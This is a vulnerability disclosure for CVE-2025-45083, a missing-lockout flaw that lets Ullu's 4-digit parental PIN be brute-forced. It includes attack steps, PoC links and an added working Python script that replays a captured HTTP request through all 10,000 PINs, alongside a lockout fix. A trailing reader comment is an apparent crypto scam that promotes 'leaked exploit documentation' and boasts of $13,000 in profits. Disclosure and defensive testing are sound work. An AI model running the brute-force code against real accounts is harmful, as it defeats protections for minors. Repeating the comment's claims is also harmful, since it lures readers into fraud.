H4cKr1337

CVE-2025-45083 - FULL DISCLOSURE

Jun 29th, 2025 (edited)
CVE ASSIGNED: CVE-2025-45083
CVE PUBLISHED STATE: PUBLISHED
CVE LINK: https://nvd.nist.gov/vuln/detail/CVE-2025-45083

Description:
An Incorrect Access Control vulnerability exists in the Ullu App for Android v2.9.929, iOS v2.8.0, and the Ullu Web Platform (https://ullu.app). The application's parental PIN protection can be bypassed by brute force because PIN entry has no rate limiting or lockout mechanism. This allows unauthorized users to disable the parental lock and gain unrestricted access to adult content on the platform.

For the mobile apps, the 4-digit PIN can be brute-forced locally, either manually through the app's PIN prompt or by hooking and automating the PIN check with tools such as Frida. For the web version, an attacker can capture the HTTP request that disables the parental PIN, replay it with every candidate PIN, and automate the brute force without triggering any defensive mechanism. A 4-digit numeric PIN has only 10,000 possible values (0000–9999), so without a lockout the correct PIN is found in at most 10,000 attempts.


Impact:
1. Bypass of parental controls, exposing restricted content to unauthorized users
2. Violation of content accessibility protections, especially for underage users
3. Escalation of privileges by circumventing access restrictions
4. Legal and compliance risks related to age-restricted content delivery

Attack Scenario:
Web:
1. User navigates to https://ullu.app/
2. Captures the HTTP request sent when entering a parental PIN
3. Brute-forces the 4-digit PIN using automated scripts (e.g., Burp Intruder or a custom Python script)
4. Disables parental control without authorization

Android & iOS App:
1. Attacker installs the app
2. Logs in using leaked credentials for any account but is blocked by the parental PIN protection
3. Sends repeated PIN attempts (via Frida) until the correct one is identified
4. Alternatively, manually tries PINs within the app interface (0000–9999)

Technical Details:
1. Vulnerability Type: Incorrect Access Control
2. CWE Classification: CWE-284 – Improper Access Control
3. Attack Type: Remote (web), Local/Remote (apps)

Affected Versions:
1. Android App: v2.9.929 (Play Store)
2. iOS App: v2.8.0 (App Store)
3. Web Platform: https://ullu.app

Impact: Escalation of Privileges, Inappropriate Content Exposure

Affected Products:
1. Ullu Web Platform: https://ullu.app
2. Ullu Android App: https://play.google.com/store/apps/details?id=cdi.videostreaming.app (v2.9.929)
3. Ullu iOS App: https://apps.apple.com/us/app/ullu/id1435281792 (v2.8.0)

Vendor Information:
1. Vendor: Ullu
2. Website: https://ullu.app/

Proof of Concept (PoC):
Web:
1. Intercept the HTTP request triggered by entering the parental PIN
2. Use a script or Burp Intruder to iterate through PINs 0000–9999
3. The parental PIN is eventually disabled and restricted content becomes accessible
4. PoC for web at - https://drive.google.com/file/d/1gVZDcBDvkQzw12SKBvRYgcaQt4UoC_KP/view?usp=sharing

Apps (Android/iOS):
1. Use a proxy (e.g., Burp Suite) or local instrumentation (e.g., Frida)
2. Identify the endpoint or local logic that verifies the PIN (Frida)
3. Iterate all 4-digit PIN combinations using automated input or request fuzzing
4. A successful PIN bypass unlocks adult content
5. PoC for app at - https://drive.google.com/file/d/1-wUA6dNIMVbv-KV7ZUDnTtC4_avh5pGf/view?usp=sharing
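The brute-force loop behind both PoCs above, written out as an added example that is not part of this disclosure and not Ullu's code. It drives the 0000–9999 keyspace against two constructed server-side stand-ins: one with the flaw described here (every attempt is checked, nothing is counted) and one with a failure counter and lockout, which is the fix the advisory implies. The PIN value, the endpoint URL, the session cookie and the JSON field name in the HTTP sender are assumptions for illustration only; the real captured request would replace them.

```python
"""Added example (not from the advisory or from Ullu): a brute-force driver
for a 4-digit PIN, run against two constructed server-side stand-ins, one
with the flaw the advisory describes (no counting, no lockout) and one with
a failure counter and lockout. The PIN value, endpoint URL, cookie and JSON
field name are assumptions for illustration only."""
import hmac
import json
import time
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Optional

PIN_SPACE = [f"{n:04d}" for n in range(10_000)]  # every 4-digit PIN, 0000-9999


@dataclass
class UnprotectedPinVerifier:
    """Stand-in for the vulnerable check: every attempt is evaluated and
    nothing is counted, so the whole keyspace can be tried."""
    pin: str
    attempts: int = 0

    def check(self, candidate: str) -> bool:
        self.attempts += 1
        return hmac.compare_digest(self.pin, candidate)


@dataclass
class LockingPinVerifier:
    """Hardened stand-in: after max_failures misses the account is locked for
    lockout_seconds and further attempts are refused, including correct ones."""
    pin: str
    max_failures: int = 5
    lockout_seconds: float = 900.0
    failures: int = 0
    locked_until: float = 0.0
    clock: Callable[[], float] = time.monotonic  # injectable for testing

    def check(self, candidate: str) -> bool:
        now = self.clock()
        if now < self.locked_until:
            raise PermissionError("PIN entry locked; retry later")
        if hmac.compare_digest(self.pin, candidate):
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= self.max_failures:
            self.locked_until = now + self.lockout_seconds
            self.failures = 0
        return False


def brute_force_pin(send_attempt: Callable[[str], bool]) -> tuple[Optional[str], int]:
    """Try 0000-9999 in order. send_attempt returns True when the server
    accepts the PIN and raises PermissionError when it locks the account.
    Returns (pin_or_None, attempts_made)."""
    tried = 0
    for candidate in PIN_SPACE:
        tried += 1
        try:
            if send_attempt(candidate):
                return candidate, tried
        except PermissionError:
            return None, tried
    return None, tried


def http_attempt_sender(url: str, cookie: str) -> Callable[[str], bool]:
    """Build a send_attempt that replays a captured request against a live
    target. Assumed: a JSON body {"pin": ...}, a session cookie, HTTP 200 on
    success, and 423/429 when the server has started locking or throttling."""
    def send(candidate: str) -> bool:
        body = json.dumps({"pin": candidate}).encode()
        req = urllib.request.Request(
            url, data=body, method="POST",
            headers={"Content-Type": "application/json", "Cookie": cookie})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status == 200
        except urllib.error.HTTPError as err:
            if err.code in (423, 429):
                raise PermissionError(f"server refused further attempts: {err.code}")
            return False
    return send


if __name__ == "__main__":
    found, n = brute_force_pin(UnprotectedPinVerifier("4821").check)
    print(f"no lockout: recovered PIN {found} after {n} attempts")
    found, n = brute_force_pin(LockingPinVerifier("4821").check)
    print(f"lockout:    {found} after {n} attempts (account locked)")
```

The driver is decoupled from transport: `brute_force_pin(http_attempt_sender(url, cookie))` runs the same loop over a replayed HTTP request, and the in-process verifiers show why the outcome differs. Against the unprotected check the assumed PIN 4821 falls after 4,822 requests; against the locking check the attack stops at the sixth attempt. A server-side fix needs the counter and lockout to be keyed to the account (not the client), and `hmac.compare_digest` avoids leaking the PIN through comparison timing.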

Discoverer:
Ishwar Kumar
Comments
  • btttid
    5 hours
    ✅ Leaked Exploit Documentation:

    https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

    This made me $13,000 in 2 days.

    Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

    Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).